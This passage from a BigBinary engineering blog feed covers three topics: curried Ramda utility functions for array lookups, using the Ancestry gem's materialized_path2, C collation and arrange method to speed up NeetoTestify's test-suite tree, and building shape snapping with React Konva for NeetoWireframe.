their usage.</p><p>Currying is a technique in functional programming where a function that takesmultiple arguments is transformed into a sequence of functions, each taking asingle argument. Simply said, currying translates a function from callable as<code>f(a, b, c)</code> into callable as <code>f(a)(b)(c)</code>. You can learn more about curryingand Ramda from our free<a href="https://courses.bigbinaryacademy.com/learn-ramdajs/introduction/currying">Learn RamdaJS book</a>.</p><p>We wrapped the definition of <code>matches</code> inside the<a href="https://ramdajs.com/docs/#curry">curry</a> function from Ramda as shown below:</p><pre><code class="language-javascript">const matches = curry((pattern, object) =&gt; {  //...matches function logic});</code></pre><p>With this update, the <code>findBy</code> function could be simplified to:</p><pre><code class="language-javascript">const findBy = (pattern, array) =&gt; array.find(matches(pattern));</code></pre><p>We also used <code>curry</code> wrapping for <code>findBy</code> function for the same reason:</p><pre><code class="language-javascript">const findBy = curry((pattern, array) =&gt; array.find(matches(pattern)));</code></pre><p>Similar to <code>findBy</code> we also introduced the following functions to simplifydevelopment:</p><ul><li><strong><code>findIndexBy(pattern, data):</code></strong> finds the first index of occurrence of anitem that matches the pattern from the given array.</li><li><strong><code>filterBy(pattern, data):</code></strong> returns the filtered array of items based onpattern matching.</li><li><strong><code>findLastBy(pattern, data):</code></strong> finds the last item that matches the givenpattern.</li><li><strong><code>removeBy(pattern, data):</code></strong> removes all items that match the given patternfrom an array of items.</li><li><strong><code>countBy(pattern, data):</code></strong> returns the number of items that match the givenpattern.</li><li><strong><code>replaceBy(pattern, newItem, data):</code></strong> replaces all items that match thegiven pattern with the given item.</li></ul><p>Here are some example usages of these functions:</p><pre><code class="language-javascript">findIndexBy({ name: &quot;Sam&quot; }, users);//returns the array index of Sam in &quot;users&quot;filterBy({ address: { street: &quot;First street&quot; } }, users);//returns a list of &quot;users&quot; who lives on First streetremoveBy({ name: &quot;Sam&quot; }, users); // removes Sam from &quot;users&quot;countBy({ age: 20 }, users);// returns the count of &quot;users&quot; who are exactly 20 years old.findLastBy({ name: includes(&quot;e&quot;) }, users);// returns the last user whose name contains the character 'e', from the array.const newItem = { id: 2, name: &quot;John&quot; };replaceBy({ name: &quot;Sam&quot; }, newItem, users);/*[  { id: 2, name: &quot;John&quot; },  { id: 2, name: &quot;Oliver&quot;, age: 40,  //... Oliver's address attributes },];*/</code></pre><h3>*ById functions</h3><p>Applications frequently rely on unique IDs for data retrieval. As a result, whenusing <strong><code>By</code></strong> functions, pattern matching for the ID becomes necessary.</p><pre><code class="language-javascript">const defaultUser = findBy({ id: DEFAULT_USER_ID }, users);</code></pre><p>To shorten this code, we developed a set of utility functions that can beinvoked directly based on the ID. Let us call them <code>ById</code> functions. With <code>ById</code>functions, we can rewrite the previous code as:</p><pre><code class="language-javascript">const defaultUser = findById(DEFAULT_USER_ID, users);</code></pre><p>Here are some of the <code>ById</code> functions we use:</p><ul><li><strong><code>findById(id, data):</code></strong> finds an object having the given <code>id</code> from an array.</li><li><strong><code>replaceById(id, newItem, data):</code></strong> returns a new array with the item havingthe given <code>id</code> replaced with the given object.</li><li><strong><code>modifyById(id, modifier, data):</code></strong> applies a modifier function to the itemin an array that matches the given <code>id</code>. It then returns a new array where thereturn value of the modifier function is placed in the index of the matchingitem.</li><li><strong><code>findIndexById(id, data):</code></strong> finds the index of an item from an array ofitems based on the <code>id</code> provided.</li><li><strong><code>removeById(id, data):</code></strong> returns a new array where the item with the given<code>id</code> is removed.</li></ul><p>Here are a few examples:</p><pre><code class="language-javascript">findById(2, users); // returns the object with id=2 from &quot;users&quot;const idOfItemToBeReplaced = 2;const newItem = { id: 3, name: &quot;John&quot; };replaceById(idOfItemToBeReplaced, newItem, users);//[ { id: 1, name: &quot;Sam&quot;, age:20, ...}, { id: 3, name: &quot;John&quot; }]const idOfItemToBeModified = 2;const modifier = item =&gt; assoc(&quot;name&quot;, item.name.toUpperCase(), item);modifyById(idOfItemToBeModified, modifier, users);//[{ id: 1, name: &quot;Sam&quot;, ... }, { id: 2, name: &quot;OLIVER&quot;, ... }]const idOfItemToBeRemoved = 2;removeById(idOfItemToBeRemoved, users);// [{ id: 1, name: &quot;Sam&quot;, ... }]</code></pre><p><a href="https://courses.bigbinaryacademy.com/learn-ramdajs/association-methods/assoc"><strong>assoc</strong></a>is a function from Ramda that makes a shallow clone of an object, setting oroverriding the specified property with the given value.</p><h2>Null-safe alternatives for pure functions</h2><p>The <code>By</code> and <code>ById</code> functions proved to be invaluable to us in improving thecode quality. However, when working with data in web applications, it is quitecommon to come across scenarios where the data being processed can be<code>null/undefined</code>. The above-mentioned implementations of the <code>By</code> and <code>ById</code>functions will fail with an error if the <code>users</code> array passed into them is<code>null/undefined</code>.</p><p>In such a case, to use the <code>filterBy</code> function, we need to adopt a method likethis:</p><pre><code class="language-javascript">users &amp;&amp; filterBy({ age: 20 }, users);</code></pre><p>So we needed a fail-safe alternative that could be used in places where the dataarray can be <code>null/undefined</code>. This null-safe alternative should avoid execution&amp; return <code>users</code> if <code>users</code> is <code>null/undefined</code>. It should work the same as<code>filterBy</code> otherwise.</p><p>Hence we created a <strong>wrapper function that would check for data nullity andexecute the child function conditionally</strong>. This is how we did it:</p><pre><code class="language-javascript">const nullSafe =  func =&gt;  (...args) =&gt; {    const dataArg = args[func.length - 1];    return isNil(dataArg) ? dataArg : func(...args);  };</code></pre><p>With the help of this <code>nullSafe</code> function, we created null-safe alternatives forall our pure functions.</p><pre><code class="language-javascript">const _replaceById = nullSafe(replaceById);const _modifyById = nullSafe(modifyById);</code></pre><p>But with the <code>nullSafe</code> wrapping, currying ceased to work for these null-safealternative functions. To retain currying, we had to rewrite <code>nullSafe</code> usingthe <a href="https://ramdajs.com/docs/#curryN">curryN</a> function from Ramda like this:</p><pre><code class="language-javascript">const nullSafe = func =&gt;  curryN(func.length, (...args) =&gt; {    const dataArg = args[func.length - 1];    return isNil(dataArg) ? dataArg : func(...args);  });</code></pre><h2>Some other useful functions</h2><h3>keysToCamelCase</h3><p>Recursively converts the snake-cased object keys to camel case.</p><pre><code class="language-javascript">const snakeToCamelCase = string =&gt;  string.replace(/(_\w)/g, letter =&gt; letter[1].toUpperCase());const keysToCamelCase = obj =&gt;  Object.fromEntries(    Object.entries(obj).map(([key, value]) =&gt; [      snakeToCamelCase(key),      typeof value === &quot;object&quot; &amp;&amp; value !== null &amp;&amp; !Array.isArray(value)        ? keysToCamelCase(value)        : value,    ])  );keysToCamelCase({  first_name: &quot;Oliver&quot;,  last_name: &quot;Smith&quot;,  address: { city: &quot;Miami&quot;, phone_number: &quot;389791382&quot; },});/*{ address: {city: 'Miami', phoneNumber: '389791382'},  firstName: &quot;Oliver&quot;, lastName: &quot;Smith&quot;,}*/</code></pre><h3>isNot</h3><p>Returns <code>true</code> if the given values (or references) are not equal. <code>false</code>otherwise.</p><pre><code class="language-javascript">const isNot = curry((x, y) =&gt; x !== y);</code></pre><p>Say, you have a task at hand - finding details about users, but specificallyexcluding the user named &quot;Sam&quot;. In such a scenario, you can retrieve theinformation as shown below:</p><pre><code class="language-javascript">filterBy({ name: name =&gt; name != &quot;Sam&quot; }, users);</code></pre><p>But this could be made more readable and concise if we have a function thatfinds the non-identical matches from <code>users</code> list. For this, you can use the<code>isNot</code> function.</p><pre><code class="language-javascript">filterBy({ name: isNot(&quot;Sam&quot;) }, users);// returns an array of all users except &quot;Sam&quot;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Improving the application performance by harnessing the full potential of ancestry gem]]></title>
       <author><name>Shemin Anto</name></author>
      <link href="https://www.bigbinary.com/blog/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem"/>
      <updated>2023-05-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem</id>
      <content type="html"><![CDATA[<p><a href="https://www.neeto.com/neetotestify">NeetoTestify</a> is a test management platformfor manual and automated QA testing. It allows us to organize test cases intological groups called test suites. A single suite can contain multiple testcases and multiple suites. The image below shows how the suites are displayed inthe UI in a hierarchical order. The arrangement in which the suites aredisplayed resembles a tree data structure.</p><p><img src="/blog_images/2023/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem/neetoTestify-test-cases-page.png" alt="Suites displayed with their hierarchial structure in NeetoTestify"></p><p>To display test suites in a tree structure, we need to store some informationabout the parent-child relationship in the database. This is where<a href="https://github.com/stefankroes/ancestry">Ancestry</a> comes in. Ancestry is a gemthat allows Rails Active Record models to be organized as a tree structure.</p><p>Normally, web applications implement pagination to show a list of records. But,implementing pagination for a tree-structured data can be challenging and canmake the application more complex. To avoid pagination, the application musthave enough performance to display an entire tree having a large number ofnodes/records without significant delays.</p><p>In this blog, we will discuss on how we leveraged the full potential of theAncestry gem to address the performance issues encountered while listing suites.</p><h3>1. Migration to materialized_path2</h3><p>There are several ways to store hierarchical data in a relational database, suchas materialized paths, closure tree tables, adjacency lists, and nested sets.Ancestry Gem uses the materialized path pattern to store hierarchical data.</p><p>The materialized path pattern is a technique in which a single node is stored inthe database as a record and it has an additional column to store thehierarchical information. In the case of the Ancestry gem, this additionalcolumn is named as <code>ancestry</code>. The <code>ancestry</code> column is used to store IDs of theancestors of a node as a single string, separated by a delimiter.</p><p>In order to understand how Ancestry gem uses materialized path pattern, firstlet's look at the nodes we have in our example. In the screenshot posted above,we see the following four nodes:</p><table><thead><tr><th>Test suite name</th><th>Node ID</th></tr></thead><tbody><tr><td>Suite 1</td><td>s1</td></tr><tr><td>Suite 1.1</td><td>s11</td></tr><tr><td>Suite 1.1.1</td><td>s111</td></tr><tr><td>Suite 1.2</td><td>s12</td></tr></tbody></table><p>In our example, the s1 is a root node, s11 and s12 are the children of node s1,and s111 is the child of s11.</p><p>In order to store the hierarchical data, the gem offers two types of ancestryformats, <code>materialized_path</code> and <code>materialized_path2</code>. In these techniques, eachnode is represented by a record in the database. Our example consists of fournodes, so there will be four records in the database. The only differencebetween <code>materialized_path</code> and <code>materialized_path2</code> lies in the format inwhich, the IDs are stored in the <code>ancestry</code> column.</p><h4>materialized_path</h4><p>Here the IDs of ancestors are stored in the format &quot;id-1/id-2/id-3&quot;, were<code>id-1</code>, <code>id-2</code> and <code>id-3</code> are the IDs of three nodes with <code>/</code> as the delimiter.The <code>id-1</code> is the root node, <code>id-2</code> is the child of <code>id-1</code> and <code>id-3</code> is thechild of <code>id-2</code>. In case of a root node, the <code>ancestry</code> will be <code>null</code>.</p><p>The table below shows how the suites in our example are stored in the databaseusing <code>materialized_path</code>:</p><table><thead><tr><th>ID</th><th>ancestry</th></tr></thead><tbody><tr><td>s1</td><td>null</td></tr><tr><td>s11</td><td>s1</td></tr><tr><td>s111</td><td>s1/s11</td></tr><tr><td>s12</td><td>s1</td></tr></tbody></table><p>This arrangement of node IDs as a single string makes it easier to query for alldescendants of a node, as we use SQL string functions to match the <code>ancestry</code>column. Here is the SQL statement to get descendants of suite s1:</p><pre><code class="language-sql">SELECT &quot;suites&quot;.* FROM &quot;suites&quot; WHERE (&quot;suites&quot;.&quot;ancestry&quot; LIKE 's1/%' OR &quot;suites&quot;.&quot;ancestry&quot; = 's1')</code></pre><p>The result of the above query is:</p><table><thead><tr><th>ID</th><th>ancestry</th></tr></thead><tbody><tr><td>s11</td><td>s1</td></tr><tr><td>s111</td><td>s1/s11</td></tr><tr><td>s12</td><td>s1</td></tr></tbody></table><h4>materialized_path2</h4><p><code>materialized_path2</code> stores ancestors in the format &quot;/id-1/id-2/id-3/&quot;, were<code>id-1</code> is the root node, <code>id-2</code> is the child of <code>id-1</code>, and <code>id-3</code> is the childof <code>id-2</code>. Here the delimiter is <code>/</code> as same as <code>materialized_path</code>, but the<code>ancestry</code> will be starting with a <code>/</code> and ending with a <code>/</code>. For a root nodethe <code>ancestry</code> will be <code>/</code>.</p><p>The table below shows how the suites in our example are stored in the databaseusing <code>materialized_path2</code>:</p><table><thead><tr><th>ID</th><th>ancestry</th></tr></thead><tbody><tr><td>s1</td><td>/</td></tr><tr><td>s11</td><td>/s1/</td></tr><tr><td>s111</td><td>/s1/s11/</td></tr><tr><td>s12</td><td>/s1/</td></tr></tbody></table><p>The SQL statement to get the descendants of suite s1 is:</p><pre><code class="language-sql">SELECT &quot;suites&quot;.* FROM &quot;suites&quot; WHERE &quot;suites&quot;.&quot;ancestry&quot; LIKE '/s1/%'</code></pre><p>The result of above query is:</p><table><thead><tr><th>ID</th><th>ancestry</th></tr></thead><tbody><tr><td>s11</td><td>/s1/</td></tr><tr><td>s111</td><td>/s1/s11/</td></tr><tr><td>s12</td><td>/s1/</td></tr></tbody></table><p>If we compare the 2 SQL queries, we can see that <code>materialized_path2</code> has oneless &quot;OR&quot; statement. This gives <code>materialized_path2</code> a slight advantage inperformance.</p><p>In NeetoTestify, we previously used the <code>materialized_path</code> format, but now wehave migrated to <code>materialized_path2</code> for improved performance.</p><h3>2. Added collation to the ancestry column</h3><p><a href="https://www.npgsql.org/efcore/misc/collations-and-case-sensitivity.html?tabs=data-annotations">Collation</a>In database systems, the index specifies how data is sorted and compared in adatabase. Collation provides the sorting rules, case sensitivity, and accentsensitivity properties for the data in the database.</p><p>As mentioned above, our resulting query for fetching the descendants of a nodewould be</p><pre><code class="language-sql">SELECT &quot;suites&quot;.* FROM &quot;suites&quot; WHERE &quot;suites&quot;.&quot;ancestry&quot; LIKE '/s1/%'</code></pre><p>It uses a <code>LIKE</code> query for comparison with a wildcard character(%). In general,when using the <code>LIKE</code> query with a wildcard character (%) on the right-hand sideof the pattern, the database can utilize an index and potentially optimize thequery performance. This optimization holds true for ASCII strings.</p><p>However, it's important to note that this optimization may not necessarily holdtrue for Unicode strings, as Unicode characters can have varying lengths anddifferent sorting rules compared to ASCII characters.</p><p>In our case, the <code>ancestry</code> column contains only ASCII strings. If we let thedatabase know about this constraint, we can optimize the database's queryperformance. To do that, we need to specify the collation type of the <code>ancestry</code>column.</p><p>From<a href="https://www.postgresql.org/docs/current/collation.html">Postgres's documentation</a>:</p><blockquote><p>The C and POSIX collations both specify traditional C behavior, in whichonly the ASCII letters A through Z are treated as letters, and sorting isdone strictly by character code byte values.</p></blockquote><p>Since we are using Postgres in NeetoTestify, we use collation <code>C</code>. Instead if weuse MySQL, then the ancestry suggests using collation <code>utf8mb4_bin</code>.</p><pre><code class="language-rb">class AddAncestryToTable &lt; ActiveRecord::Migration[6.1]  def change    change_table(:table) do |t|      # postgres      t.string &quot;ancestry&quot;, collation: 'C', null: false      t.index &quot;ancestry&quot;      # mysql      t.string &quot;ancestry&quot;, collation: 'utf8mb4_bin', null: false      t.index &quot;ancestry&quot;    end  endend</code></pre><h3>3. Usage of arrange method</h3><p>Previously, we were constructing the tree structure of the suites by fetchingthe children of each node individually from the database. For this, we firstfetched the suites whose <code>ancestry</code> is <code>/</code> (root nodes). Then, for each of thesesuites, we fetched their children, and repeated this process until we reachedleaf-level suites.</p><p><img src="/blog_images/2023/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem/previous-approach-to-list-suites.png" alt="Previous approach to list suites"></p><p>This recursive approach results in a large number of database queries, causingperformance issues as the tree size increases. Constructing a tree with n(4)nodes required n+1(5) database queries, adding to the complexity of the process.</p><p><img src="/blog_images/2023/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem/current-approach-to-list-suites.png" alt="Current approach to list suites"></p><p>The <code>arrange</code> method provided by Ancestry gem, converts the array of nodes intonested hashes, utilizing the <code>ancestry</code> column information. Also by using thismethod the number of database queries will remain 1, even if the number ofsuites and nested suites increases.</p><pre><code class="language-rb">suites = project.suites# SELECT &quot;suites&quot;.* FROM &quot;suites&quot; WHERE &quot;suites&quot;.&quot;project_id&quot; = &quot;p1&quot;# [#   &lt;Suite id: &quot;s1&quot;, project_id: &quot;p1&quot;, name: &quot;Suite 1&quot;, ancestry: &quot;/&quot;&gt;,#   &lt;Suite id: &quot;s11&quot;, project_id: &quot;p1&quot;, name: &quot;Suite 1.1&quot;, ancestry: &quot;/s1/&quot;&gt;,#   &lt;Suite id: &quot;s111&quot;, project_id: &quot;p1&quot;, name: &quot;Suite 1.1.1&quot;, ancestry: &quot;/s1/s11/&quot;&gt;,#   &lt;Suite id: &quot;s12&quot;, project_id: &quot;p1&quot;, name: &quot;Suite 1.2&quot;, ancestry: &quot;/s1/&quot;&gt;# ]suites.arrange# {#   &lt;Suite id: s1, project_id: &quot;p1&quot;, name: &quot;Suite 1&quot;, ancestry: &quot;/&quot;&gt; =&gt; {#     &lt;Suite id: s11, project_id: &quot;p1&quot;, name: &quot;Suite 1.1&quot;, ancestry: &quot;/s1/&quot;&gt; =&gt; {#       &lt;Suite id: s111, project_id: &quot;p1&quot;, name: &quot;Suite 1.1.1&quot;, ancestry: &quot;/s1/s11/&quot;&gt; =&gt; {}#     },#     &lt;Suite id: s12, project_id: &quot;p1&quot;, name: &quot;Suite 1.2&quot;, ancestry: &quot;/s1/&quot;&gt; =&gt; {}#   }# }</code></pre><p>The recursive approach took 5.72 seconds to retrieve 170 suites, but the arrayconversion approach of <code>arrange</code> method, retrieved the same number of suites in728.72 ms.</p><p><img src="/blog_images/2023/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem/performance-comparison.png" alt="Performance comparison"></p><p>The above image shows the advantage in performance while using the <code>arrange</code>method over the recursive approach. For the comparison of two approaches 170suites and 1650 test cases were considered.</p><p>By implementing the above 3 best practices, we were able to considerably improvethe overall performance of the application.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Shape snapping with React Konva while building NeetoWireframe]]></title>
       <author><name>Ajmal Noushad</name></author>
      <link href="https://www.bigbinary.com/blog/shape-snapping-with-react-konva"/>
      <updated>2023-05-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/shape-snapping-with-react-konva</id>
      <content type="html"><![CDATA[<h3>Introduction</h3><p>Shape snapping is a feature in software that allows shapes or objects to beautomatically aligned or adjusted to a particular grid when they are moved orresized. This feature helps to ensure that shapes are properly aligned andpositioned in relation to other shapes, making it easier to build a design wherethings are properly aligned.</p><p>We needed &quot;shape snapping&quot; in<a href="https://neeto.com/neetowireframe">NeetoWireframe</a>. NeetoWireframe is a tool forcreating interactive wireframes and prototypes. neetoWirefame is one of thevarious tools being built by <a href="https://neeto.com">neeto</a>.</p><p>NeetoWireframe uses <a href="https://konvajs.org/docs/react/Intro.html">React Konva</a> tobuild wireframes and prototypes. React Konva is a JavaScript library thatprovides a React component interface to the Konva library, a powerful 2D drawinglibrary for the web. React Konva enables developers to create and manipulatecomplex graphics and visualizations in a declarative and efficient way usingfamiliar React patterns. With React Konva, developers can easily createcanvas-based applications, animations, interactive games, and rich userinterfaces. React Konva is highly customizable and provides many features, suchas shapes, animations, event handling, and filters. It is an open-source libraryand is widely used in web development projects.</p><p>Let's see how we implemented snapping shapes while dragging them in the canvasbased on the position of other shapes in the canvas.</p><h3>Setting up the canvas </h3><p>To begin, we will set up the canvas with a few shapes.</p><pre><code class="language-jsx">import React, { useState } from &quot;react&quot;;import { Stage, Layer, Rect, Circle } from &quot;react-konva&quot;;const SHAPES = [  {    id: &quot;1&quot;,    x: 0,    y: 0,    height: 100,    width: 100,    fill: &quot;red&quot;,    shape: Rect,  },  {    id: &quot;2&quot;,    x: 170,    y: 150,    height: 100,    width: 100,    fill: &quot;blue&quot;,    shape: Rect,  },  {    id: &quot;3&quot;,    x: 200,    y: 350,    height: 100,    width: 100,    fill: &quot;black&quot;,    shape: Circle,  },  {    id: &quot;4&quot;,    x: 450,    y: 250,    height: 100,    width: 100,    fill: &quot;green&quot;,    shape: Circle,  },];export default function App() {  return (    &lt;div style={{ width: window.innerWidth, height: window.innerHeight }}&gt;      &lt;Stage width={window.innerWidth} height={window.innerHeight}&gt;        &lt;Layer&gt;          {SHAPES.map(({ shape: Shape, ...props }) =&gt; (            &lt;Shape key={props.id} draggable name=&quot;shape&quot; {...props} /&gt;          ))}        &lt;/Layer&gt;      &lt;/Stage&gt;    &lt;/div&gt;  );}</code></pre><p>The <code>name</code> prop is passed to all the Shapes in the canvas with a value of<code>&quot;shape&quot;</code>. This helps us to query and find the shapes in the canvas that we needto use for snapping logic.</p><p>We have now set up a canvas with a few circles and squares that can be dragged.Link to<a href="https://codesandbox.io/s/trusting-darwin-cj55c7?file=/src/App.js">Codesandbox</a>.</p><p><img src="/blog_images/2023/shape-snapping-with-react-konva/draggable-canvas.gif" alt="Draggable canvas"></p><h3>Lets add a Transformer </h3><p>In Konva, a <code>Transformer</code> is a node that allows a user to transform ormanipulate a selected Konva shape on a canvas. It provides handles for rotating,scaling, and dragging the selected shape.</p><p>We add <code>Transformer</code> node to allow the user to apply transformations to theshapes in the canvas. Transformations like translation, scaling and rotationscan be triggered on shapes through the provided handles. Also we would belistening to events from transformer nodes for implementing the snapping.</p><p><img src="/blog_images/2023/shape-snapping-with-react-konva/transforms-demo.gif" alt="Transforms demo"></p><p><code>Transformer</code> can be imported from <code>react-konva</code> just like the other nodes. Wecan add a transformer to the canvas by adding it as a child to the <code>Layer</code>. Besure to include a reference to both the <code>Transformer</code> and <code>Stage</code> so that we canaccess them later.</p><p>Let's also configure <code>onMouseDown</code> handler for shapes to select the shape andattach it to the transformer whenever we click on them. To unselect whenclicking outside of a shape, add an <code>onClick</code> handler in Stage to remove thenodes from the <code>Transformer</code> by validating whether the event target is the<code>Stage</code> node.</p><pre><code class="language-jsx">export default function App() {  const stageRef = useRef();  const transformerRef = useRef();  return (    &lt;div style={{ width: window.innerWidth, height: window.innerHeight }}&gt;      &lt;Stage        onClick={e =&gt;          e.target === stageRef.current &amp;&amp; transformerRef.current.nodes([])        }        ref={stageRef}        width={window.innerWidth}        height={window.innerHeight}      &gt;        &lt;Layer&gt;          {SHAPES.map(({ shape: Shape, ...props }) =&gt; (            &lt;Shape              key={props.id}              draggable              name=&quot;shape&quot;              onMouseDown={e =&gt; transformerRef.current.nodes([e.currentTarget])}              {...props}            /&gt;          ))}          &lt;Transformer ref={transformerRef} /&gt;        &lt;/Layer&gt;      &lt;/Stage&gt;    &lt;/div&gt;  );}</code></pre><h3>Implementing snapping </h3><p>Now that we have set up the Transformer. Let's implement snapping. With thatfeature, when a shape is dragged near another shape, the edges or the center ofthe dragged shape should automatically align with the edges or the center of theother shape in such a way that they are in the same line.</p><p>We will also show horizontal and vertical lines to visualize the snapping.</p><p><img src="/blog_images/2023/shape-snapping-with-react-konva/snapping-demo.gif" alt="Snapping Demo"></p><p>We will be using <code>dragmove</code> event in the Transformer node to implement snapping.</p><p>On <code>dragmove</code> event, we will find the possible snapping lines based on all theshapes on the canvas first.</p><p>To get all shapes on the canvas, we can use the <code>find</code> method on the <code>Stage</code>node. We will be using the <code>name</code> prop that we passed to all the shapes to queryand get all the shapes in the canvas.</p><p>We don't want the selected shape to be considered for snapping. So we will bepassing the selected shape as an argument <code>excludedShape</code> to the function.</p><p>The <code>getClientRect</code> method on the shape node returns the bounding box rectangleof a node irrespective of it's shape. We will be using that to find the edgesand center of each shape.</p><pre><code class="language-js">const getSnapLines = excludedShape =&gt; {  const stage = stageRef.current;  if (!stage) return;  const vertical = [];  const horizontal = [];  // We snap over edges and center of each object on the canvas  // We can query and get all the shapes by their name property `shape`.  stage.find(&quot;.shape&quot;).forEach(shape =&gt; {    // We don't want to snap to the selected shape, so we will be passing them as `excludedShape`    if (shape === excludedShape) return;    const box = shape.getClientRect({ relativeTo: stage });    vertical.push([box.x, box.x + box.width, box.x + box.width / 2]);    horizontal.push([box.y, box.y + box.height, box.y + box.height / 2]);  });  return {    vertical: vertical.flat(),    horizontal: horizontal.flat(),  };};</code></pre><p>Then we find the snapping points for the selected shape.</p><p>The <code>Transformer</code> node creates a shape named <code>back</code> that covers the entireselected shape area. We will be using that to find the snapping edges of theselected shape.</p><p>Relative position of the <code>back</code> shape to the <code>Stage</code> node is the same as theselected shape. So we can use the <code>getClientRect</code> method on the <code>back</code> shape toget the bounding box of the selected shape.</p><pre><code class="language-js">const getShapeSnappingEdges = () =&gt; {  const stage = stageRef.current;  const tr = transformerRef.current;  const box = tr.findOne(&quot;.back&quot;).getClientRect({ relativeTo: stage });  const absPos = tr.findOne(&quot;.back&quot;).absolutePosition();  return {    vertical: [      // Left vertical edge      {        guide: box.x,        offset: absPos.x - box.x,        snap: &quot;start&quot;,      },      // Center vertical edge      {        guide: box.x + box.width / 2,        offset: absPos.x - box.x - box.width / 2,        snap: &quot;center&quot;,      },      // Right vertical edge      {        guide: box.x + box.width,        offset: absPos.x - box.x - box.width,        snap: &quot;end&quot;,      },    ],    horizontal: [      // Top horizontal edge      {        guide: box.y,        offset: absPos.y - box.y,        snap: &quot;start&quot;,      },      // Center horizontal edge      {        guide: box.y + box.height / 2,        offset: absPos.y - box.y - box.height / 2,        snap: &quot;center&quot;,      },      // Bottom horizontal edge      {        guide: box.y + box.height,        offset: absPos.y - box.y - box.height,        snap: &quot;end&quot;,      },    ],  };};</code></pre><p>From the possible snapping lines and the snapping edges of the selected shape,we will find the closest snapping lines.</p><p>We will define a <code>SNAP_THRESHOLD</code> to fix how close the shape should be to thesnapping line to trigger a snap. Let's give it a value of <code>5</code> pixels. Based onthe threshold, we will find the snap lines that can be considered for snapping.</p><p>Sorting the snap lines based on the distance between the line and the selectedshape will give us the closest snapping lines as the first element in the array.</p><pre><code class="language-js">const SNAP_THRESHOLD = 5;const getClosestSnapLines = (possibleSnapLines, shapeSnappingEdges) =&gt; {  const getAllSnapLines = direction =&gt; {    const result = [];    possibleSnapLines[direction].forEach(snapLine =&gt; {      shapeSnappingEdges[direction].forEach(snappingEdge =&gt; {        const diff = Math.abs(snapLine - snappingEdge.guide);        // If the distance between the line and the shape is less than the threshold, we will consider it a snapping point.        if (diff &gt; SNAP_THRESHOLD) return;        const { snap, offset } = snappingEdge;        result.push({ snapLine, diff, snap, offset });      });    });    return result;  };  const resultV = getAllSnapLines(&quot;vertical&quot;);  const resultH = getAllSnapLines(&quot;horizontal&quot;);  const closestSnapLines = [];  const getSnapLine = ({ snapLine, offset, snap }, orientation) =&gt; {    return { snapLine, offset, orientation, snap };  };  // find closest vertical and horizontal snappping lines  const [minV] = resultV.sort((a, b) =&gt; a.diff - b.diff);  const [minH] = resultH.sort((a, b) =&gt; a.diff - b.diff);  if (minV) closestSnapLines.push(getSnapLine(minV, &quot;V&quot;));  if (minH) closestSnapLines.push(getSnapLine(minH, &quot;H&quot;));  return closestSnapLines;};</code></pre><p>We need the closest snapping lines to be drawn on the canvas. We will be using<code>Line</code> node from <code>react-konva</code> for that. We can add a pair of states to storethe coordinates of vertical and horizontal lines.</p><p>We will split the closest snapping lines into horizontal and vertical lines andset them in the corresponding states.</p><pre><code class="language-js">const drawLines = (lines = []) =&gt; {  if (lines.length &gt; 0) {    const lineStyle = {      stroke: &quot;rgb(0, 161, 255)&quot;,      strokeWidth: 1,      name: &quot;guid-line&quot;,      dash: [4, 6],    };    const hLines = [];    const vLines = [];    lines.forEach(l =&gt; {      if (l.orientation === &quot;H&quot;) {        const line = {          points: [-6000, 0, 6000, 0],          x: 0,          y: l.snapLine,          ...lineStyle,        };        hLines.push(line);      } else if (l.orientation === &quot;V&quot;) {        const line = {          points: [0, -6000, 0, 6000],          x: l.snapLine,          y: 0,          ...lineStyle,        };        vLines.push(line);      }    });    // Set state    setHLines(hLines);    setVLines(vLines);  }};</code></pre><p>Let's combine all the above functions and create a <code>onDragMove</code> handler for the<code>Transformer</code> node.</p><p>We will be using the <code>getNodes</code> method on the <code>Transformer</code> node to get theselected shape.</p><p>Based on the selected shape and the canvas, we will find the closest snappinglines.</p><p>If there are no snapping lines within the <code>SNAP_THRESHOLD</code>, we will clear thelines from the canvas and return from the function.</p><p>Otherwise, we will draw the lines on the canvas and calculate the new positionof the selected shape based on the closest snapping lines.</p><pre><code class="language-js">const onDragMove = () =&gt; {  const target = transformerRef.current;  const [selectedNode] = target.getNodes();  if (!selectedNode) return;  const possibleSnappingLines = getSnapLines(selectedNode);  const selectedShapeSnappingEdges = getShapeSnappingEdges();  const closestSnapLines = getClosestSnapLines(    possibleSnappingLines,    selectedShapeSnappingEdges  );  // Do nothing if no snapping lines  if (closestSnapLines.length === 0) {    setHLines([]);    setVLines([]);    return;  }  // draw the lines  drawLines(closestSnapLines);  const orgAbsPos = target.absolutePosition();  const absPos = target.absolutePosition();  // Find new position  closestSnapLines.forEach(l =&gt; {    const position = l.snapLine + l.offset;    if (l.orientation === &quot;V&quot;) {      absPos.x = position;    } else if (l.orientation === &quot;H&quot;) {      absPos.y = position;    }  });  // calculate the difference between original and new position  const vecDiff = {    x: orgAbsPos.x - absPos.x,    y: orgAbsPos.y - absPos.y,  };  // apply the difference to the selected shape.  const nodeAbsPos = selectedNode.getAbsolutePosition();  const newPos = {    x: nodeAbsPos.x - vecDiff.x,    y: nodeAbsPos.y - vecDiff.y,  };  selectedNode.setAbsolutePosition(newPos);};</code></pre><p>Finally, let's include the above functions inside the component and attach the<code>onDragMove</code> handler to <code>Transformer</code>.</p><pre><code class="language-jsx">export default function App() {  const [hLines, setHLines] = useState([]);  const [vLines, setVLines] = useState([]);  const transformerRef = useRef();  // define onDragMove here  return (    &lt;div style={{ width: window.innerWidth, height: window.innerHeight }}&gt;      &lt;Stage width={window.innerWidth} height={window.innerHeight}&gt;        &lt;Layer&gt;          {SHAPES.map(({ shape: Shape, ...props }) =&gt; (            &lt;Shape              onMouseDown={e =&gt; transformerRef.current.nodes([e.currentTarget])}              draggable              ref={props.shapeRef}              {...props}            /&gt;          ))}          &lt;Transformer ref={transformerRef} onDragMove={onDragMove} /&gt;          {hLines.map((item, i) =&gt; (            &lt;Line key={i} {...item} /&gt;          ))}          {vLines.map((item, i) =&gt; (            &lt;Line key={i} {...item} /&gt;          ))}        &lt;/Layer&gt;      &lt;/Stage&gt;    &lt;/div&gt;  